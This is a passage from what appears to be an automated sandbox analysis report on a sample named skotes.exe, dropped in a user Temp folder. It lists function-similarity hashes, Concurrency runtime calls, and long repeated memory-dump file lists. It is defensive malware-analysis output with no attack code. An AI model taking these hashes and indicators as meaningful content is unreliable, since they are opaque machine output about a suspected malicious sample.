                                                                                                                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                                                                                                                              • Opcode ID: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                                                                                                                              • Instruction ID: bca49a4637bc23815e2f88e120f1083fd40f250f728b184884aba06719b01935
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feee73c32697c1c68bc9a8ab72e18e64f0fec090ee49a0492b3fa6b3f0e131e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7601F931700525FFDA257B61E8C2D7EBBE9FF4471070000A9F6155B631DB20EC2986D0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFD0C5
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFD0D7
                                                                                                                                                                                                                                                • Part of subcall function 00BFC6B2: _InternalDeleteHelper.LIBCONCRT ref: 00BFC6C4
                                                                                                                                                                                                                                              • ListArray.LIBCONCRT ref: 00BFD0E1
                                                                                                                                                                                                                                              • _InternalDeleteHelper.LIBCONCRT ref: 00BFD0FA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3844194624-0
                                                                                                                                                                                                                                              • Opcode ID: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                                                                                                                              • Instruction ID: 7f2075ff0c6a878ccf401ad051af1c2bf72ec1386d8405dc5b2deac2d1169ec8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c62740cbdede6a2dd2ba16e2894cfcbd091cb11a09e69c3f216d1aca49daf7e5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6501F931700529BFCA257B71D9C6D7DBBEAFF4471070004AAF6049B611DF60ECA986D0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00C033DB
                                                                                                                                                                                                                                              • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00C033EF
                                                                                                                                                                                                                                              • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00C03407
                                                                                                                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00C0341F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 78362717-0
                                                                                                                                                                                                                                              • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                              • Instruction ID: a21e87af684a472f02b33d30800162f4b9eff442f799810196b92a4d9a98de7e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C01D632600554A7CF16EE958881AEFBBADDF44750F100455FD26AF2D2DA71EF01E6A0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00BF9519
                                                                                                                                                                                                                                                • Part of subcall function 00BEF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00BF5486
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00BF953D
                                                                                                                                                                                                                                              • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00BF9550
                                                                                                                                                                                                                                              • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00BF9559
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478784297.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478916346.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479082698.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479224017.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3479587230.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480189121.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480364133.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480502735.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480582275.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480721803.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3480920537.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481180448.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481324628.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3481427628.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_6_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 218105897-0
                                                                                                                                                                                                                                              • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                              • Instruction ID: 73a0e23ed20315df7f9986902d5deac03f2d8780ebc438e3567620419cfa8963
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F3F0E570600B245FEA72AB688812F7A23D4DF40715F00C49EE61BD72C2CF24F84ACB91
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00C0DFE8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000006.00000002.3457897829.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457753663.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3457897829.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458429750.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458649300.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3458785892.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459052762.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3459270282.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3460431228.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3461770601.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3463645711.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464669746.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3464800919.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3466594651.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467635601.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3467790959.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469684463.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3469922798.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3473492363.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3474734079.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3475645098.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476651388.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3476938674.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477070298.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477264101.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477393595.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477657476.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3477851250.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478022799.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478177580.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478382081.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000006.00000002.3478540619.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
